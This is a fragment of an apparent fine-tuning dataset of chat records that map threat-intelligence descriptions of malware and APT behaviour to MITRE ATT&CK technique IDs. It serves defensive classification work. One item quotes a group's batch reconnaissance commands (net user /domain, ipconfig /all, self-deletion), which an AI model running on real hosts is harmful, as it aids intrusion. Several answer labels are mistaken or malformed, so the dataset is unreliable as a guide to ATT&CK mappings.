- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth can provide a remote shell. One version of Helminth uses batch scripting."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Iranian government-sponsored APT actors may have established new user accounts on domain controllers, servers, workstations, and active directories. Some of these accounts appear to have been created to look similar to other existing accounts on the network, so specific account names may vary per organization. In addition to unrecognized user accounts or accounts established to masquerade as existing accounts, the following account usernames may be associated with this activity: Support Help elie WADGUtilityAccount"
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account', 'T1136.002 - Create Account: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "More_eggs has the capability to gather the OS version and computer name."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "variants have communicated with C2 servers over HTTP and HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can execute \"getinfo\" to identify the username on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT has the ability to hide and unhide files."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Executes VBScript using Process.Start. The third-stage DLL proceeds by loading the \"AdvancedRun\" resource into memory, decompressing it and dropping it as \"AdvancedRun.exe\" into the %TEMP% directory. Drops AdvancedRun.exe using File.WriteAllBytes. AdvancedRun.exe\" is a tool provided by Nirsoft to execute a program with different settings. Once the tool is dropped, the third stage DLL will leverage it to execute two commands in the context of the Windows TrustedInstaller group. The TrustedInstaller group was an addition to Windows beginning in Windows 7 with the goal of preventing accidental damage to critical system files. AdvanceRun is one of the tools that can be used to execute commands in the context of the TrustedInstaller user. This functionality is only available via CLI and requires the flag of \"/RunAs 8\", which is shown in the commands below. The tool will be deleted from the %TEMP% directory after executing both commands. The first command leverages the Windows service control application (sc.exe) to disable Windows Defender"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools', 'T1078.001 - Valid Accounts: Default Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUNSPOT only replaces SolarWinds Orion source code if the MD5 checksums of both the original source code file and backdoored replacement source code match hardcoded values."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IRON TWILIGHT’s email credential targeting system allows the threat group to target and exploit accounts for webmail services such as Gmail and Hotmail, as well as corporate email platforms that use webmail interfaces. When targeting email services that provide alternate methods to authenticate account access, such as Gmail’s use of OAuth, the threat actors may abuse this feature to maintain a persistent session with the compromised account"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT10 has targeted or compromised manufacturing companies in India, Japan and Northern Europe; a mining company in South America; and multiple IT service providers worldwide. Traditional and Novel Methods . This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. In addition to the spear phishes, FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers. Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider’s customer. In addition, web traffic between a service provider’s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily. A notable instance of this observed by FireEye involved a SOGU backdoor that was set to communicate with its C2 through a server belonging to the victim’s service provider. The actor then tested connectivity to an IP managed by the victim’s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim’s SOGU backdoor. This effectively routes SOGU malware traffic through the victim’s service provider, which likely indicates a foothold on the service provider’s network. Their abuse of access to service provider networks demonstrates that peripheral organizations continue to be of interest to a malicious actor – especially those seeking alternative angles of attack"
- },
- {
- "role": "assistant",
- "content": "T1199 - Trusted Relationship"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lizar can migrate the loader into another process."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While we can only speculate on the specific reason, it is likely Sofacy packed only the Delphi variants in an attempt to increase evasion as the Delphi variant of Zebrocy is known and has been widely analyzed"
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After this information is obtained, the attacker can generate and send a specially crafted HTTP POST request to the Exchange server with an XML SOAP payload to the Exchange Web Services (EWS) API endpoint"
- },
- {
- "role": "assistant",
- "content": "T1590 - Gather Victim Network Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rising Sun can detect the computer name, operating system, and drive information, including drive type, total number of bytes on disk, total number of free bytes on disk, and name of a specified volume."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After decrypting and decompressing the strings, we can trivially identify aspects of the PlugX configuration"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has the ability to record audio."
- },
- {
- "role": "assistant",
- "content": "T1123 - Audio Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aria-body has the ability to identify the username on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the ability to discover and manipulate Windows services."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ADVSTORESHELL stores output from command execution in a .dat file in the %TEMP% directory."
- },
- {
- "role": "assistant",
- "content": "T1074.001 - Data Staged: Local Data Staging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel's configuration is hardcoded and RC4 encrypted within the binary."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax can check the current date-time value of the compromised system, comparing it to the hardcoded execution trigger and can send the current timestamp to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deleted Registry keys during post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro has used malicious links to gain execution on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a Registry subkey that registers a new service."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service', 'T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GALLIUM established persistence for PoisonIvy by created a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can access the \"HKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData\" Registry key to obtain the System manufacturer value to identify the machine type."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has hosted malicious payloads in Dropbox, Amazon S3, and Google Drive for use during targeting."
- },
- {
- "role": "assistant",
- "content": "T1608.001 - Upload Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PipeMon can inject its modules into various processes using reflective DLL loading."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stuxnet attempts to access network resources with a domain account’s credentials."
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerShell Cobalt Strike Beacon - New payload + new C2 domain - PowerShell Obfuscator - All the new PowerShell payloads are obfuscated using a publicly available script adapted from a Daniel Bohannon’s GitHub project. Using this tool, the attackers could overcome a password reset. Customized Windows Credentials Dumper - A PowerShell password dumper that is based on a known password dumping tool, using PowerShell bypass and reflective loading. The attackers specifically used it to obtain Outlook passwords. Customized Outlook Credentials Dumper - Inspired by known Outlook credentials dumpers"
- },
- {
- "role": "assistant",
- "content": "T1552.002 - Unsecured Credentials: Credentials in Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT captures keystrokes and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"time /t\" and \"net time \\\\ip/hostname\" for system time discovery."
- },
- {
- "role": "assistant",
- "content": "T1124 - System Time Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gelsemium can set persistence with a Registry run key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "8 Upload the TPX498.dat file, which contains the list of collected keystrokes"
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is installed via execution of rundll32 with an export named \"init\" or \"InitW.\""
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information about available drives, default browser, desktop file list, My Documents, Internet history, program files, and root of available drives. It also searches for ICS-related software files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can decrypt strings using the victim's hostname as the key."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a suspended svchost process and injects its DLL into it."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SOUNDBITE is capable of enumerating application windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wiarp creates a backdoor through which remote attackers can open a command line interface."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Silence has used environment variable string substitution for obfuscation."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VBShower has the ability to download VBS files to the target computer."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This PowerShell backdoor was observed to be related to the SystemBC malware as a service. The script has a hard coded C&C server IP address and port number to connect to, with data passed to the “Rc4_crypt” function before connection."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "queries several Registry keys to identify hard disk partitions to overwrite."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the deletion process, the malware gets the function “Wow64RevertWow64FsRedirection” using the function “GetProcAddress” and calls it in a dynamic way to leave the system in the same state as before"
- },
- {
- "role": "assistant",
- "content": "T1070 - Indicator Removal on Host"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "performs data exfiltration over the control server channel using a custom protocol."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have covered recent FIN7 activity in previous public blog posts: FIN7 Spear Phishing Campaign Targets Personnel Involved in SEC Filings FIN7 Evolution and the Phishing LNK To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity"
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "“Knock” also appears in several strings inside the code of SpeakUp"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Zeus Panda checks to see if anti-virus, anti-spyware, or firewall products are installed in the victim’s environment."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AppleSeed can use \"GetKeyState\" and \"GetKeyboardState\" to capture keystrokes on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In another update, the P8RAT sample from August 2020 looks for two process names (“VBoxService.exe” and “vmtoolsd.exe”) on the victim’s system, to detect VMware or VirtualBox environments at the beginning of its main malicious function"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Next, the third-stage DLL will load the \"Waqybg\" resource into memory. As the resource is stored in reverse byte order, the third-stage DLL will restore it by reversing the bytes and then proceed to decompress it. The decompressed data is the fourth stage wiper payload. After decompressing the data, the third-stage DLL copies a legitimate Windows utility \"InstallUtil.exe\" into the %TEMP% directory, creates a suspended process with it and injects the fourth-stage wiper into the process. Finally, it resumes the process and transfers the execution flow to the fourth-stage wiper. Creates InstallUtil.exe process"
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ember Bear has obfuscated malware and malicious scripts to help avoid detection."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Key Points PrivateLoader is a downloader malware family that was first identified in early 2021 The loader’s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OSInfo discovers information about the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8 has used \"sslip.io\", a free IP to domain mapping service that also makes SSL certificate generation easier for traffic encryption, as part of their command and control."
- },
- {
- "role": "assistant",
- "content": "T1102 - Web Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can spawn remote shells."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can use HTTP or SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command execution, file transmission and keylogging. It was executed via rundll32 commands such as"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1059 - Command and Scripting Interpreter', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperStack can enumerate all account names on a remote share."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We observed the threat group issue the following commands: @echo off dir c:\\ >> %temp%\\download ipconfig /all >> %temp%\\download net user >> %temp%\\download net user /domain >> %temp%\\download ver >> %temp%\\download del %0 @echo off dir \"c:\\Documents and Settings\" >> %temp%\\download dir \"c:\\Program Files\\ \" >> %temp%\\download net start >> %temp%\\download net localgroup administrator >> %temp%\\download netstat -ano >> %temp%\\download These commands allow the threat group to gain information about the compromised computer and the network to which it belongs"
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery', 'T1105 - Ingress Tool Transfer', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The RAT, however, had a multitude of functionalities (as listed in the table below) such as to download and execute, compress, encrypt, upload, search directories, etc"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Xbash uses HTTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SUPERNOVA contained Base64-encoded strings."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can extract clipboard data from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HEXANE has used password spraying attacks to obtain valid credentials."
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
